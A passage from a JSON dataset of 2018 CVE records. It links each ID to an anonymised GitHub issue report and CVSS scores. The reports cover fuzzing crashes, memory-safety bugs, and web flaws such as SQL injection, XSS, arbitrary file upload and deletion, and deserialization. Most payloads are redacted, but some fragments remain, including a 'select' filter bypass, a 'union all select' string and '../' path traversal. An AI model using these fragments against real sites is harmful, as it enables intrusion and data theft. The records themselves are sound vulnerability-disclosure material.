        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11738",
        "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/1265",
        "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/1265",
        "Repo_new": "sleuthkit/sleuthkit",
        "Issue_Created_At": "2018-06-03T13:31:44Z",
        "description": "APITAG out of bounds read (OOB) in ntfs_make_data_run ( PATHTAG ). Hey there, I have discovered an out of bounds read in the sleuth kit at: APITAG URLTAG Found when fuzzing commit APITAG Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in sleuth kit releases from FILETAG up until and including the latest release FILETAG You can find a collection of APITAG files that trigger the bug FILETAG The full ASAN report is shown below: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11739",
        "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/1267",
        "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/1267",
        "Repo_new": "sleuthkit/sleuthkit",
        "Issue_Created_At": "2018-06-03T13:33:35Z",
        "description": "APITAG out of bounds read (OOB) in raw_read ( PATHTAG ). Hey there, I have discovered an out of bounds read in the sleuth kit at: APITAG URLTAG Found when fuzzing commit APITAG Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in sleuth kit releases from FILETAG up until and including the latest release FILETAG You can find a collection of APITAG files that trigger the bug FILETAG . The full ASAN report is shown below: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11740",
        "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/1264",
        "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/1264",
        "Repo_new": "sleuthkit/sleuthkit",
        "Issue_Created_At": "2018-06-03T03:45:46Z",
        "description": "APITAG out of bounds read (OOB) in APITAG ( PATHTAG ). Hey there, I have discovered a one byte out of bounds read in the sleuth kit at: APITAG URLTAG Found when fuzzing commit APITAG Compile flags to reproduce: APITAG System information: ERRORTAG This bug was found to be in sleuth kit releases from FILETAG until the recent commit fuzzed APITAG You can find a collection of APITAG files that trigger the bug FILETAG . The full ASAN report is shown below: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-11743",
        "Issue_Url_old": "https://github.com/mruby/mruby/issues/4027",
        "Issue_Url_new": "https://github.com/mruby/mruby/issues/4027",
        "Repo_new": "mruby/mruby",
        "Issue_Created_At": "2018-05-28T21:58:48Z",
        "description": "Use of uninitialized pointer in mrb_hash_keys. The following input demonstrates a crash: APITAG ASAN report: ERRORTAG This issue was reported by Daniel Teuchert, Cornelius Aschermann, Tommaso Frassetto, and Tigist Abera ( URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12022",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2052",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2052",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2018-05-29T20:03:23Z",
        "description": "CVE (id to be allocated): LDAP backed data source gadgets. Another approach to Default Typing vector is via data source definitions that allow passing LDAP url. There are NUMBERTAG reported gadgets covered under this particular issue.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 5.9,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2018-12023",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2058",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2058",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2018-06-08T05:30:38Z",
        "description": "CVETAG : Block polymorphic deserialization of types from Oracle JDBC driver. There is a potential remote code execution (RCE) vulnerability, if user is NUMBERTAG handling untrusted content (where attacker can craft JSON NUMBERTAG using APITAG Typing\" feature (or equivalent; polymorphic value with base type of APITAG NUMBERTAG has oracle JDBC driver jar in classpath NUMBERTAG allows connections from service to untrusted hosts (where attacker can run an LDAP service) (note: steps NUMBERTAG and NUMBERTAG are common steps as explained in URLTAG To solve the issue NUMBERTAG types from JDBC driver are blacklisted to avoid their use as \"serialization gadgets\".",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 5.9,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2018-12034",
        "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/891",
        "Issue_Url_new": "https://github.com/virustotal/yara/issues/891",
        "Repo_new": "virustotal/yara",
        "Issue_Created_At": "2018-06-07T22:55:17Z",
        "description": "Out of bounds read, write in yr_execute_code. APITAG has several bugs in the implementation of the virtual machine. Two of which prove to be security issues that allow code execution by running a specially crafted binary rule: An out of bounds read in the opcode OP_PUSH_M URLTAG An out of bounds write in the opcode OP_POP_M URLTAG . These issues have been assigned the CVE ID's APITAG and APITAG , respectively. Obvious ways to mitigate this: checking every access to scratch memory require an explicit flag to load and run a compiled rule check every relocated address is within the loaded file make the loaded file read only While this might not be _as_ critical as say, a vulnerability that can be exploited by a rule in source form, YARA will run a binary rule without explicitly being told to do so. This means any service/third party who doesn't properly validate the user supplied rule is susceptible. I suggest you reject rules in binary form unless explicitly being allowed to do so. For the ones interested, I've written a (very long) write up URLTAG and made the APITAG exploit available here URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-12039",
        "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/425",
        "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/425",
        "Repo_new": "joyplus/joyplus-cms",
        "Issue_Created_At": "2018-06-07T08:36:26Z",
        "description": "joyplus cms has SQL code execution vulnerability. We can find website absolute path on this page: FILETAG in my test environment the absolute path is PATHTAG and execute the SQL statement in this page: FILETAG There is a note here that we can't use \"select\" directly. Here I used \"/ !select /\" to replace \"select\" then click the \"\u6267\u884c\"\uff08execute\uff09button\uff0cfinally we can find the phpinfo page on FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12047",
        "Issue_Url_old": "https://github.com/XIMDEX/ximdex/issues/147",
        "Issue_Url_new": "https://github.com/ximdex/xcms/issues/147",
        "Repo_new": "ximdex/xcms",
        "Issue_Created_At": "2018-06-06T09:13:40Z",
        "description": "you have twelve parameters exists xss Vulnerability in search page.. Vulnerability url : URLTAG Vulnerability parameters: filter FILETAG NUMBERTAG use hackbar to simulate post submission, submit payload NUMBERTAG the response page will pop up the set contents according to the inserted js code NUMBERTAG using another question parameters found to produce the same effect. FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12051",
        "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/5",
        "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/5",
        "Repo_new": "unh3x/just4cve",
        "Issue_Created_At": "2018-06-07T08:36:17Z",
        "description": "Schools Alert Management Script Arbitrary File Upload. ================= Schools Alert Management Script Arbitrary File Upload ================= Date NUMBERTAG endor Homepage: FILETAG Software Link: URLTAG Category: Web Application Exploit Author: M3 MENTIONTAG From APITAG Tested on: Linux Mint CVE: assign for cve ================= Vulnerable cgi: ================= FILETAG ================= Proof of Concept: ================= ERRORTAG FILETAG FILETAG . Shell is shown in response data, just enjoy it. .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12053",
        "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/6",
        "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/6",
        "Repo_new": "unh3x/just4cve",
        "Issue_Created_At": "2018-06-07T08:56:29Z",
        "description": "Schools Alert Management Script Arbitrary File Deletion. ================= Schools Alert Management Script Arbitrary File Deletion ================= Date NUMBERTAG endor Homepage: FILETAG Software Link: URLTAG Category: Web Application Exploit Author: M3 MENTIONTAG From APITAG CVE: assign for cve ================= Vulnerable cgi: ================= FILETAG ================= Proof of Concept: ================= APITAG notice: There is a risk of file deletion\uff0cyou'd better test it combined with the furthur file upload vulnerability. Attackers can delete any file through parameter 'img' with '../' .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12054",
        "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/4",
        "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/4",
        "Repo_new": "unh3x/just4cve",
        "Issue_Created_At": "2018-06-07T02:03:32Z",
        "description": "Schools Alert Management Script Arbitrary File Read. ================= Schools Alert Management Script Arbitrary File Read ================= Date NUMBERTAG endor Homepage: FILETAG Software Link: URLTAG Category: Web Application Exploit Author: M3 MENTIONTAG From APITAG Tested on: Linux Mint CVE: assign for cve ================= Vulnerable cgi: ================= FILETAG ================= Proof of Concept: ================= APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12055",
        "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/2",
        "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/2",
        "Repo_new": "unh3x/just4cve",
        "Issue_Created_At": "2018-06-06T23:57:11Z",
        "description": "Schools Alert Management Script Multiple SQL Injections. ================= Exploit Title: Schools Alert Management Script SQL Injections Date NUMBERTAG endor Homepage: FILETAG Software Link: URLTAG Category: Web Application Exploit Author: M3 MENTIONTAG From APITAG Tested on: Linux Mint CVE: assign for cve ================= Vulnerable cgi NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG NUMBERTAG FILETAG ================= Proof of Concept ================= POST URLTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12065",
        "Issue_Url_old": "https://github.com/Creatiwity/wityCMS/issues/152",
        "Issue_Url_new": "https://github.com/creatiwity/witycms/issues/152",
        "Repo_new": "creatiwity/witycms",
        "Issue_Created_At": "2018-06-08T06:35:41Z",
        "description": "The Local File Inclusion vulnerability in PATHTAG I found a local file inclusion vulnerability.An attacker might include local PHP files or read non PHP files with this vulnerability. Reference: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12085",
        "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/595",
        "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/595",
        "Repo_new": "liblouis/liblouis",
        "Issue_Created_At": "2018-06-05T21:09:49Z",
        "description": "APITAG stack based buffer overflow APITAG in NUMBERTAG in APITAG FILETAG Tested commit: APITAG Credit: Henri Salo Tools: american fuzzy lop URLTAG NUMBERTAG b, afl utils URLTAG Thanks to Kapsi internet k\u00e4ytt\u00e4j\u00e4t ry for providing valuable fuzzing resources. ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12089",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/4628",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/4628",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2018-06-11T05:39:23Z",
        "description": "SF Target prints password in clear text. Scenario: Service Fabric Cluster Target Configured with Azure Active Directory security mode APITAG set to true Password from will be printed in clear text in the log file Venerable in versions NUMBERTAG APITAG Fixed in NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 5.9,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2018-12092",
        "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/78",
        "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/78",
        "Repo_new": "syoyo/tinyexr",
        "Issue_Created_At": "2018-06-10T08:47:01Z",
        "description": "Heap buffer overflow in APITAG git log commit APITAG Author: Syoyo Fujita APITAG Date: Thu Jun NUMBERTAG I build tinyexr with clang and address sanitizer. When testcase (see: URLTAG is input into test_tinyexr (command: ./test_tinyexr testcase), a heap buffer overflow has triggered. Address sanitizer provided information as below NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG a NUMBERTAG b NUMBERTAG d at pc NUMBERTAG b bp NUMBERTAG ffe8c NUMBERTAG dd NUMBERTAG sp NUMBERTAG ffe8c NUMBERTAG dd NUMBERTAG READ of size NUMBERTAG at NUMBERTAG a NUMBERTAG b NUMBERTAG d thread T NUMBERTAG a in APITAG char , int const , unsigned char const , unsigned long, int, int, int, int, int, int, int, int, unsigned long, unsigned long, APITAG const , unsigned long, APITAG const , std::vector<unsigned long, std::allocator<unsigned long> > const&) PATHTAG NUMBERTAG in APITAG , APITAG const , std::vector<unsigned long, std::allocator<unsigned long> > const&, unsigned char const , unsigned long) PATHTAG NUMBERTAG fd4 in APITAG PATHTAG NUMBERTAG a8a in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG f5 in main PATHTAG NUMBERTAG f2ff6d NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG NUMBERTAG a NUMBERTAG b NUMBERTAG d is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG in operator new(unsigned long) PATHTAG NUMBERTAG b3 in APITAG char>::allocate(unsigned long, void const ) PATHTAG NUMBERTAG b3 in APITAG char> APITAG char>&, unsigned long) PATHTAG NUMBERTAG b3 in APITAG char, std::allocator<unsigned char> >::_M_allocate(unsigned long) PATHTAG NUMBERTAG b3 in APITAG char, std::allocator<unsigned char> >::_M_create_storage(unsigned long) PATHTAG NUMBERTAG b3 in APITAG char, std::allocator<unsigned char> APITAG long, std::allocator<unsigned char> const&) PATHTAG NUMBERTAG b3 in std::vector<unsigned char, std::allocator<unsigned char> >::vector(unsigned long, std::allocator<unsigned char> const&) PATHTAG NUMBERTAG b3 in APITAG PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG char , int const , unsigned char const , unsigned long, int, int, int, int, int, int, int, int, unsigned long, unsigned long, APITAG const , unsigned long, APITAG const , std::vector<unsigned long, std::allocator<unsigned long> > const&) Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING Load EXR err: Failed to parse channel APITAG NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12093",
        "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/79",
        "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/79",
        "Repo_new": "syoyo/tinyexr",
        "Issue_Created_At": "2018-06-10T08:48:05Z",
        "description": "Memory leaks in APITAG git log commit APITAG Author: Syoyo Fujita APITAG Date: Thu Jun NUMBERTAG I build tinyexr with clang and leak sanitizer. When testcase (see: URLTAG is input into test_tinyexr (command: ./test_tinyexr testcase), sanitizer detected memory leaks in APITAG . Leak sanitizer provided information as below NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG in strdup PATHTAG NUMBERTAG a6a7 in APITAG PATHTAG NUMBERTAG cd in APITAG PATHTAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12101",
        "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/496",
        "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/496",
        "Repo_new": "clippercms/clippercms",
        "Issue_Created_At": "2019-08-05T20:58:58Z",
        "description": "HTML injection is found in CMS Clipper NUMBERTAG ersion. HTML injection found in the APITAG name\" field in CMS Clipper NUMBERTAG APITAG module name value is obtained from the user,it is getting saved and displayed without any sanitation. Affected URL: URLTAG Steps to reproduce: APITAG Security >> Manager Permissions >> User Groups NUMBERTAG Create New user group using APITAG is Prasad Lingamaiah APITAG ! APITAG NUMBERTAG Goto the APITAG Group links and html script will execute For your reference: FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-12101",
        "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/487",
        "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/487",
        "Repo_new": "clippercms/clippercms",
        "Issue_Created_At": "2018-06-10T20:09:24Z",
        "description": "XSS. XSS is found in the APITAG name\" field in CMS Clipper NUMBERTAG ersion. The Security name value is obtained from the webusers, having search parameter for user list. it is getting reflected and displayed without any sanitation. Affected URL: URLTAG Steps to POC NUMBERTAG access the URL URLTAG NUMBERTAG Under Security tab, click on web users >>search parameter NUMBERTAG in search parameter enter XSS payload '\">> APITAG APITAG APITAG \"> APITAG APITAG APITAG and click on GO button APITAG script is getting executed. For your reference: FILETAG FILETAG FILETAG FILETAG FILETAG Mitigation: Sanitize HTML Markup with a Library Designed for the Job Never Insert Untrusted Data Except in Allowed Locations HTML Escape Before Inserting Untrusted Data into HTML Element Content Attribute Escape Before Inserting Untrusted Data into HTML Common Attributes URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-12101",
        "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/488",
        "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/488",
        "Repo_new": "clippercms/clippercms",
        "Issue_Created_At": "2018-06-10T20:32:47Z",
        "description": "Stored XSS in Manager Permissions. Stored XSS is found in the APITAG Permissions\" field in CMS Clipper NUMBERTAG ersion. The Manager Permissions value is obtained from the User Groups, Resource Groups and Users/resource group links. which having adding users list and groups list. it is getting stored and displayed without any sanitation. Affected URL: URLTAG Steps to POC NUMBERTAG access the URL URLTAG NUMBERTAG Under Security tab, click on Manager Permissions APITAG Groups in User Groups parameter try to Create a new Users Group XSS payload APITAG '\"> and click on submit button APITAG script is getting executed NUMBERTAG Under Security tab, click on Manager Permissions APITAG Groups in User Groups parameter try to Create a new Resource Group XSS payload APITAG '\"> and click on submit button APITAG script is getting executed NUMBERTAG Users/resource group links submit the XSS payload which we have saved. For your reference: FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG FILETAG Mitigation: Sanitize HTML Markup with a Library Designed for the Job Never Insert Untrusted Data Except in Allowed Locations HTML Escape Before Inserting Untrusted Data into HTML Element Content Attribute Escape Before Inserting Untrusted Data into HTML Common Attributes URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-12102",
        "Issue_Url_old": "https://github.com/mity/md4c/issues/41",
        "Issue_Url_new": "https://github.com/mity/md4c/issues/41",
        "Repo_new": "mity/md4c",
        "Issue_Created_At": "2018-06-11T03:31:18Z",
        "description": "NULL pointer dereferenc in APITAG i find a Segmentation fault ,when i used md2html. ./md2html github crash1 it is a NULL pointer dereferenc in URLTAG ctx >current_block is a null pointer. but i find you did the assert in URLTAG dont know why it does not work. i just git clone it and use cmake . and make to build it. CODETAG this is the crash file : FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-12104",
        "Issue_Url_old": "https://github.com/airbnb/knowledge-repo/issues/431",
        "Issue_Url_new": "https://github.com/airbnb/knowledge-repo/issues/431",
        "Repo_new": "airbnb/knowledge-repo",
        "Issue_Created_At": "2018-06-10T10:17:29Z",
        "description": "XSS vulnerability. Auto reviewers: MENTIONTAG MENTIONTAG MENTIONTAG MENTIONTAG Hello, guys! There is a cross site scripting (XSS) vulnerability in the Knowledge Repo NUMBERTAG other versions may be affected as well) which allows remote attackers to inject arbitrary APITAG via post comments functionality. Steps to reproduce: Just open any post like this FILETAG and add the following code as a APITAG APITAG side attacks is possible here!\"); APITAG Impact: An unauthenticated evil user can leverage the vulnerability to conduct various types of client side attacks, for example, conducting a browser mining, redirecting users to malicious sites or hijacking the user\u2019s browser using malware. As an irrefutable evidence please take a look at the attached screen shot. Mitigation: Details on how to prevent XSS can be found here: URLTAG APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12108",
        "Issue_Url_old": "https://github.com/dropbox/lepton/issues/107",
        "Issue_Url_new": "https://github.com/dropbox/lepton/issues/107",
        "Repo_new": "dropbox/lepton",
        "Issue_Created_At": "2018-06-09T13:49:30Z",
        "description": "Program received signal SIGFPE, Arithmetic exception. . Hi, all. This malformed lepton file can cause crash. Program received signal SIGFPE, Arithmetic exception. This is the FILETAG . ERRORTAG Here is the gdb information: CODETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-12109",
        "Issue_Url_old": "https://github.com/FLIF-hub/FLIF/issues/513",
        "Issue_Url_new": "https://github.com/flif-hub/flif/issues/513",
        "Repo_new": "flif-hub/flif",
        "Issue_Created_At": "2018-06-10T09:04:50Z",
        "description": "FLIF crash with specific image: heap buffer overflow. Hi, all. This PAM image file can cause crash. It can cause heap buffer overflow. Here is ASAN result and I attached the FILETAG . Thanks. Execute the following command: APITAG ASAN result: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-12110",
        "Issue_Url_old": "https://github.com/oyeahtime/test/issues/2",
        "Issue_Url_new": "https://github.com/oyeahtime/test/issues/2",
        "Repo_new": "oyeahtime/test",
        "Issue_Created_At": "2018-06-11T01:28:26Z",
        "description": "APITAG sql injection. APITAG is free open source file with PHP. There is a SQL injection vulnerability in the portfoliocms We can get the source code : URLTAG the SQL injection use like this NUMBERTAG install the portfoliocms,for example : URLTAG the sql injection payload: URLTAG and NUMBERTAG union all select APITAG NUMBERTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-12112",
        "Issue_Url_old": "https://github.com/mity/md4c/issues/42",
        "Issue_Url_new": "https://github.com/mity/md4c/issues/42",
        "Repo_new": "mity/md4c",
        "Issue_Created_At": "2018-06-11T09:09:38Z",
        "description": "heap_overflow in function md_build_attribute APITAG commit cb7ecd7 ./md2html github crash2 in function md_build_attribute , URLTAG The raw_size is too large to cause a heap overflow ERRORTAG poc file: FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-12229",
        "Issue_Url_old": "https://github.com/pkp/pkp-lib/issues/3785",
        "Issue_Url_new": "https://github.com/pkp/pkp-lib/issues/3785",
        "Repo_new": "pkp/pkp-lib",
        "Issue_Created_At": "2018-06-11T18:53:52Z",
        "description": "Correct missing escaping of template variable. The APITAG variable in APITAG is not escaped.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-12247",
        "Issue_Url_old": "https://github.com/mruby/mruby/issues/4036",
        "Issue_Url_new": "https://github.com/mruby/mruby/issues/4036",
        "Repo_new": "mruby/mruby",
        "Issue_Created_At": "2018-06-05T19:02:11Z",
        "description": "Null pointer dereference in mrb_class. The following input demonstrates a crash: APITAG Note that I was only able to reproduce this issue when building mruby on a NUMBERTAG bit Linux system. (I used Ubuntu NUMBERTAG for testing.) I could not reproduce on NUMBERTAG bit Linux or NUMBERTAG bit APITAG Valgrind report: ERRORTAG This issue was reported by URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-12248",
        "Issue_Url_old": "https://github.com/mruby/mruby/issues/4038",
        "Issue_Url_new": "https://github.com/mruby/mruby/issues/4038",
        "Repo_new": "mruby/mruby",
        "Issue_Created_At": "2018-06-05T22:08:03Z",
